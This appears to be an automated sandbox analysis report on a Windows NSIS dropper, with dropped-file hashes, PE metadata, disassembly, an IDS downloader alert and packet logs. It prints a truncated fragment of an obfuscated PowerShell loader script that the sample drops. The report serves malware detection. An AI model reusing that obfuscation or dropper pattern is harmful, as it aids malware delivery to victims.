                                                                                              Category:dropped
                                                                                              Size (bytes):486421
                                                                                              Entropy (8bit):1.2470433609131586
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:p9ffEEX6My2RPkr6vyxsgBVdhrF8pGQkuxMSmLgnrL94:bffg2CJbdlFhh2Mwl4
                                                                                              MD5:858C7D246EC84B37359FDE23A9F8898A
                                                                                              SHA1:2046EFB2E9421F1F1C0CABA9F0D7ECCAD1F4AE0F
                                                                                              SHA-256:100C199A129F94FB16BDD51943FB691AB055CEA690088691C0F989D4C1C75884
                                                                                              SHA-512:547AA46E6279DD8DF920C2BF21B5A98B47F8B2F81E32FB36678119BC9510CA7D358C38C63E46E71285B76236D46D515CFE7C4DEA37660AE63E533AB78878ABBB
                                                                                              Malicious:false
                                                                                              Preview:......................................................................;.............................................................Do.......................................9.....................................................................................8...................T......................................................................................................................................k.............................................................{.(................c.............................).....s..................... ..................N.............q............2..............................................................................................c...................C..........................................G......................`.......|..............7.........0!..................p.........'..............)..........v.z.......................................................................................................[.s............~..A...+..

                                                                                              C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic\hickishness.non

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):327732
                                                                                              Entropy (8bit):1.2609335393847756
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rbmwczlydY1vPDT6+VOPnd7avS0bYT7bUkf0+VNt8xT70sob8aN/qfizqd71OFNj:sQdCVXhCo3Vxd/SRgV133ZBLlo
                                                                                              MD5:622032628F068FE10CC2E51D0502CC9A
                                                                                              SHA1:5AE897F10B51533C20489B755F4395FCED7EB67C
                                                                                              SHA-256:840F31C02A7A8CA755C4CD53619D9F93BB42848DD334B25A0A3C72B13F5753F4
                                                                                              SHA-512:2E5C98D7E3FE856D22381B2B97BAC5DF50C82859CB62DCF1D2FE3386B79D96446887FECB59D43F924200532399307E3846DDECA33FB87A286ADD5E6CEFC10637
                                                                                              Malicious:false
                                                                                              Preview:.).............\....................).....................q............A.....c..................................[..,........................(...................................................................}...................................................^................`.................................%.............................................................................L....................~d...............N..........................................h......~.............................~.........B...................Z....0..........................q................................v.......................................k............Y.............................................|..................................................................1.................T......................................................................................................................k........................................D...-.V..z...'........................................

                                                                                              C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic\hogni.opd

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):433848
                                                                                              Entropy (8bit):1.255481788885247
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:8agBmxdiio94Vue1rGruEhQHTvyGPHzfrm75zidpc8oUH392slzddIRzyP98UmYu:NgKjnn/NnW5hQAPAfMqoDH+bI
                                                                                              MD5:7586252625434A405256063977B84D0D
                                                                                              SHA1:BA800F4510A4940F6EA11F866E3F4AF9805BDFD4
                                                                                              SHA-256:5AFA5BC29281632F196999E16D8F4B26F2C14EC6A8A5F589DC5932B6DE78A2A7
                                                                                              SHA-512:613E03C6EC8DFBE0B2B6A450B30B932157FE40121E6A7E4AE9FB188193AB6E5D3CA044F30351A3E969FD84BAC8BC7AD2B7DD5E9D0BB091FEDE0546CC9E3A3856
                                                                                              Malicious:false
                                                                                              Preview:...............1.............L..................................................................3...............................m...............................................................................................y...........n.................A................G...........$............................m.........................X..............................................................................5.....G.............^....................................\........v.....................-......................................................."............................V........0....................G.........................................................................................................#.....B...............V.....................x............U......................T................................>.................w..............;.....................................L.....................................................................y,.................

                                                                                              C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic\solvejg.non

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):327124
                                                                                              Entropy (8bit):1.2472891497347776
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:qw1bcEnP59OCTltLumdIdNK2mkVYYHN44jjU5S6EP1KRuM/VTCo0oXATL4bYZcOO:jucypY8Gyju3O4/iALDvWJTAnjPqqaO
                                                                                              MD5:0EC84A842970A2C0B04893F66217F733
                                                                                              SHA1:E100ACDACE598C27B00E0AF658306942A70228FC
                                                                                              SHA-256:6B3552FC5295BE3AE9FADD8AFA8A06103BD60DDB6E0BE924C61B346895505A7A
                                                                                              SHA-512:27270395859FEF2B270B7C2C70FA587BAF4FDCFF742DA93B6F7D1B0B82B5B1FF0BA9004BD3B825A9A62FAE75FB0F792A176ECE980529B61A2FEADE958B8B0BFB
                                                                                              Malicious:false
                                                                                              Preview:................:............................q......................[.................c.....................................{.... ..................................K....U............4.........................................@.........................................................\...............e...........................3................J.........L*....................................................................................(.......@..........................................................................g....................4.............................b.......2...............................p.....t.......................4\.................&......d...........................................................................................k......k........................................................................................................................................................................................\....................................0........M

                                                                                              C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (4151), with CRLF, LF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):72178
                                                                                              Entropy (8bit):5.161150728391685
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:46DE7jedqYs72dYAWmfVh7ZVuKgsJ/5f/P+SYpgVZjswGbRch4Pt6C:zDE2dqX+YzmfTuPsZ5fBPVZjswocSR
                                                                                              MD5:48C389453F2D33288CC98CEBDF2CB813
                                                                                              SHA1:5852C4C8747D5B0A12DA630CC7710556614DDDDB
                                                                                              SHA-256:9FF2EF5992F74954230F92775E391F7FB06989860E4573D609015A4B4D219CA0
                                                                                              SHA-512:064DB1A1E93236EB969F8D666135564EA2EDA419867F3AB0831081659F499A61490CB608DC71E3B17F91D9754B47C3FB9FEEC52D18DF34FC9FE054BE8587B1F8
                                                                                              Malicious:false
                                                                                              Preview:$Vaabensmuglingernes229=$Videreuddannelsens;.....<#Midterste Spaghettistrop Myth #>..<#Tilegnelser Klbedes Ministry Skitsebgernes #>..<#Artisters christiansfelds Fordanskning #>..<#Nullermand Raastofforbrugenes Bestikkelsers Yawniness Dosimetries Safters #>..<#Edelhards Nusle Evangelieteksternes Ejects Trophology Slummiest Shibboleter #>..<#Refried Costopneumopexy Blokken Kontohaverne Byggemodnes Bught Sejlgarnsngler #>...$Chuffing = @'.Skiffer.Insiste$ B sparSMinell,pFortr,la Na,riud IgnobliB.faldpcOksekdeiDamprutfTffelhelAflaasnoduellerrUhensigaBkautonlCrouchi=Slut un$FalsityR boligmeTradeabeStocka v S perban rvimocUge,ortuTndinguaNonbroot BefrieeR.allns; Bisulf.Gematr,fRegnefeuP.issernUfo nufcSommerbtBloomssiCikadenoalveolonDalre,s Levia hAUnfortufNektaret uperimo Gasko,pNonstim Barrik( S uder$Sk,llevVRes rinaOpsnusegBigamsnr MiguelaTriangenAfloesetAfk.ydsiArriebosUnlaboreMer ant, Boresk$VarisciV,ormidli tvrelsn T arepdChaliniaFilm,dklRefntryo Jim.ieoPerunpa) Sermon S ftdri{Progno

                                                                                              C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\brugerinstallation.cry

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0, imaginary
                                                                                              Category:dropped
                                                                                              Size (bytes):462783
                                                                                              Entropy (8bit):1.2514895750557933
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:gR0px6Iw5kvIV8FuWk8mGWwi1BoFIN8oYd:jmIwavC6utxgIjYd
                                                                                              MD5:77218C2134D28A666F2FDEAA5E452489
                                                                                              SHA1:16E2234D9C2F4E4265D1362887B40149B9E31823
                                                                                              SHA-256:A901A3525DC18A4A9E6EF655931252D8258D954D419FCE81668F251C8EF54EE5
                                                                                              SHA-512:AFE9F39C392A6DE29B551393CB032534D04AA18B82E747406A23828DE7B4088FBA3045F0DD8ECC37C3A4FE45125605C0504EA8A1C38DA429624A35753E8E3ED2
                                                                                              Malicious:false
                                                                                              Preview:....................]l................pq......................................................................................................p..........................................&...........................................................................].................v.................,.............................................................*.........................+........2.............................GI=..............,............................I............to....{........................8...........f..........XF.........O.............................................................].................-....................+........................2...........................B......................m.....^......................................................................................z....;.........x.....................................................................................................................4.............6...6............s.................

                                                                                              C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\cloner.hol

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):457562
                                                                                              Entropy (8bit):1.2482312628496608
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:2jMpNhAlrasgHvP3V5s9ASYucRtPbRS9y:hpNhX93V5sOSTczjB
                                                                                              MD5:E4AC954ED484155B2A165BF00B1E8A4F
                                                                                              SHA1:21ACBAC21538E0258892381807BBE19524DA02E3
                                                                                              SHA-256:3078C30C80C29C473A796C4E1FE5F89A175D9B23FC88DBCD0262D93B0C67BEED
                                                                                              SHA-512:A63E484A5CF926E2484B69210BE047B1F90DAC2A0F813E33D2F1B507CC45AF21169AEC9EBEAA6152CDB2448BEE7B09D82E4427C7596E864B09A7A15560D323AC
                                                                                              Malicious:false
                                                                                              Preview:.......v......... ....:...........r.........................V.......l...Z...^.....................q........................l.........d.c............................................................Y.........................7.....................................o.....................T.................................T...................................n..............................................................g.3......................................................o.....................................X..0.....................................................:..........................Z?..........................s........O........>.................._.................................P.................................................$.................M.....................1........-..............................................I...........(..............................................................m..............-................................................o.....................

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                              Entropy (8bit):7.5565849180901195
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:LMSxhK1u8Z.exe
                                                                                              File size:1'048'752 bytes
                                                                                              MD5:f2827f013a265de94993c62bf9756b00
                                                                                              SHA1:9cc4cc403434e08c9c2e2ab312980cad6b2470ca
                                                                                              SHA256:fe05b02fda8dc707ceb4143b4a2e4d6553d5410f226907cf0ae318b54edf28b2
                                                                                              SHA512:02af8c436750df4e9c36ce4e93d4f263563bbc6052693441b82cc2e970fafca557039fae92cee0493ecd28d433c7c8594433421ced08f033ed8fd317b12e090b
                                                                                              SSDEEP:24576:2j+EpTNHhl/G2yQhhdR/mwmNG3Ap137dboaPjyMi76KbP:S+OT5vG2y2hvXt3IRM+i76y
                                                                                              TLSH:8E252342FAD190AED4B64632CA5BD63E047AED5CDC400613A7643F4F797AA82AC3435F
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....e.Q.................b...........1............@

                                                                                              File Icon

                                                                                              Icon Hash:0d4f7fd151493b07

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x4031dd
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:true
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x519965E1 [Sun May 19 23:53:05 2013 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:7fd61eafe142870d6d0380163804a642

                                                                                              Authenticode Signature

                                                                                              Signature Valid:false
                                                                                              Signature Issuer:CN=Snobbismens, O=Snobbismens, L=Besan\xe7on, C=FR
                                                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                              Error Number:-2146762487
                                                                                              Not Before, Not After
                                                                                              • 13/07/2024 08:23:03 13/07/2027 08:23:03
                                                                                              Subject Chain
                                                                                              • CN=Snobbismens, O=Snobbismens, L=Besan\xe7on, C=FR
                                                                                              Version:3
                                                                                              Thumbprint MD5:B4D054FDC4E6394CF0C3F6C9CEF374D6
                                                                                              Thumbprint SHA-1:1D54D11202914B6E52F124CA4CBDC2933D6CCEC8
                                                                                              Thumbprint SHA-256:A0F5D37522682D51C6953814803EC1FBD1BE02B5799C3689AE8E71EA223D1617
                                                                                              Serial:5835A1A469993DF5C03E2F2A2279AE0FB77356F9

                                                                                              Entrypoint Preview

                                                                                              Instruction
                                                                                              sub esp, 000002D4h
                                                                                              push ebx
                                                                                              push ebp
                                                                                              push esi
                                                                                              push edi
                                                                                              push 00000020h
                                                                                              xor ebp, ebp
                                                                                              pop esi
                                                                                              mov dword ptr [esp+18h], ebp
                                                                                              mov dword ptr [esp+10h], 0040A2D8h
                                                                                              mov dword ptr [esp+14h], ebp
                                                                                              call dword ptr [00408034h]
                                                                                              push 00008001h
                                                                                              call dword ptr [00408134h]
                                                                                              push ebp
                                                                                              call dword ptr [004082ACh]
                                                                                              push 00000008h
                                                                                              mov dword ptr [00434F58h], eax
                                                                                              call 00007FF3C8D79E85h
                                                                                              mov dword ptr [00434EA4h], eax
                                                                                              push ebp
                                                                                              lea eax, dword ptr [esp+34h]
                                                                                              push 000002B4h
                                                                                              push eax
                                                                                              push ebp
                                                                                              push 0042B1B8h
                                                                                              call dword ptr [0040817Ch]
                                                                                              push 0040A2C0h
                                                                                              push 00433EA0h
                                                                                              call 00007FF3C8D79AF0h
                                                                                              call dword ptr [00408138h]
                                                                                              mov ebx, 0043F000h
                                                                                              push eax
                                                                                              push ebx
                                                                                              call 00007FF3C8D79ADEh
                                                                                              push ebp
                                                                                              call dword ptr [0040810Ch]
                                                                                              cmp word ptr [0043F000h], 0022h
                                                                                              mov dword ptr [00434EA0h], eax
                                                                                              mov eax, ebx
                                                                                              jne 00007FF3C8D76FFAh
                                                                                              push 00000022h
                                                                                              mov eax, 0043F002h
                                                                                              pop esi
                                                                                              push esi
                                                                                              push eax
                                                                                              call 00007FF3C8D7954Ch
                                                                                              push eax
                                                                                              call dword ptr [00408240h]
                                                                                              mov dword ptr [esp+1Ch], eax
                                                                                              jmp 00007FF3C8D770B9h
                                                                                              push 00000020h
                                                                                              pop edx
                                                                                              cmp cx, dx
                                                                                              jne 00007FF3C8D76FF9h
                                                                                              inc eax
                                                                                              inc eax
                                                                                              cmp word ptr [eax], dx
                                                                                              je 00007FF3C8D76FEBh
                                                                                              add word ptr [eax], 0000h

                                                                                              Rich Headers

                                                                                              Programming Language:
                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

                                                                                              Data Directories

                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85a00xb4.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x2eba8.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xff7a80x908
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              .text0x10000x60100x6200c51ae685760de510818d22f29d66b8b0False0.6646603954081632data6.440168137798694IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x80000x14600x160024345ed7377f4b4663284282b5ef48b3False0.42134232954545453data4.947177345443015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                              .data0xa0000x2af980x600dc268be7d1af6fdfcd38d44492cfdaf5False0.486328125data3.791234740340295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .ndata0x350000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x550000x2eba80x2ec00bdebbd0274fda95ee828978bf6f6217fFalse0.3979413853609626data3.9167771947187013IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                              Resources

                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_ICON0x553880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.364929610789069
                                                                                              RT_ICON0x65bb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.403011351692243
                                                                                              RT_ICON0x6f0580x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.4087218045112782
                                                                                              RT_ICON0x758400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4187615526802218
                                                                                              RT_ICON0x7acc80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.40298771846953235
                                                                                              RT_ICON0x7eef00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4413900414937759
                                                                                              RT_ICON0x814980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4702157598499062
                                                                                              RT_ICON0x825400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5204918032786885
                                                                                              RT_ICON0x82ec80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5824468085106383
                                                                                              RT_DIALOG0x833300x100dataEnglishUnited States0.5234375
                                                                                              RT_DIALOG0x834300x11cdataEnglishUnited States0.6091549295774648
                                                                                              RT_DIALOG0x835500xc4dataEnglishUnited States0.5918367346938775
                                                                                              RT_DIALOG0x836180x60dataEnglishUnited States0.7291666666666666
                                                                                              RT_GROUP_ICON0x836780x84dataEnglishUnited States0.7272727272727273
                                                                                              RT_VERSION0x837000x1d8dataEnglishUnited States0.5317796610169492
                                                                                              RT_MANIFEST0x838d80x2cbXML 1.0 document, ASCII text, with very long lines (715), with no line terminatorsEnglishUnited States0.5664335664335665

                                                                                              Imports

                                                                                              DLLImport
                                                                                              KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                              ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                              ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                              Possible Origin

                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                              EnglishUnited States

                                                                                              Network Behavior

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2025-01-11T03:52:30.599048+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736172.217.16.206443TCP

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 11, 2025 03:52:29.558969021 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:29.559068918 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:29.559156895 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:29.576759100 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:29.576797009 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.219093084 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.219208002 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:30.219769001 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.219834089 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:30.277571917 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:30.277625084 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.278629065 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.278803110 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:30.283752918 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:30.327339888 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.599142075 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.599272013 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:30.599311113 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.599390030 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.599407911 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:30.599445105 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:30.600672960 CET49736443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:30.600708008 CET44349736172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.628582954 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:30.628676891 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:30.628768921 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:30.629023075 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:30.629053116 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.271264076 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.271503925 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.279377937 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.279442072 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.279830933 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.280031919 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.280376911 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.323379040 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.704921961 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.705126047 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.705162048 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.705240011 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.705291986 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.705291986 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.705318928 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.705368996 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.705368996 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.705420971 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.717552900 CET49737443192.168.2.4172.217.16.129
                                                                                              Jan 11, 2025 03:52:31.717643023 CET44349737172.217.16.129192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.836612940 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:31.836715937 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.836950064 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:31.837681055 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:31.837711096 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.949893951 CET5345653192.168.2.4162.159.36.2
                                                                                              Jan 11, 2025 03:52:31.954725981 CET5353456162.159.36.2192.168.2.4
                                                                                              Jan 11, 2025 03:52:31.954804897 CET5345653192.168.2.4162.159.36.2
                                                                                              Jan 11, 2025 03:52:31.959683895 CET5353456162.159.36.2192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.423290014 CET5345653192.168.2.4162.159.36.2
                                                                                              Jan 11, 2025 03:52:32.428533077 CET5353456162.159.36.2192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.428597927 CET5345653192.168.2.4162.159.36.2
                                                                                              Jan 11, 2025 03:52:32.472996950 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.473088980 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.473656893 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.473685026 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.473880053 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.473891973 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.858211994 CET44349738172.217.16.206192.168.2.4
                                                                                              Jan 11, 2025 03:52:32.858494043 CET49738443192.168.2.4172.217.16.206
                                                                                              Jan 11, 2025 03:52:32.858520031 CET44349738172.217.16.206192.168.2.4
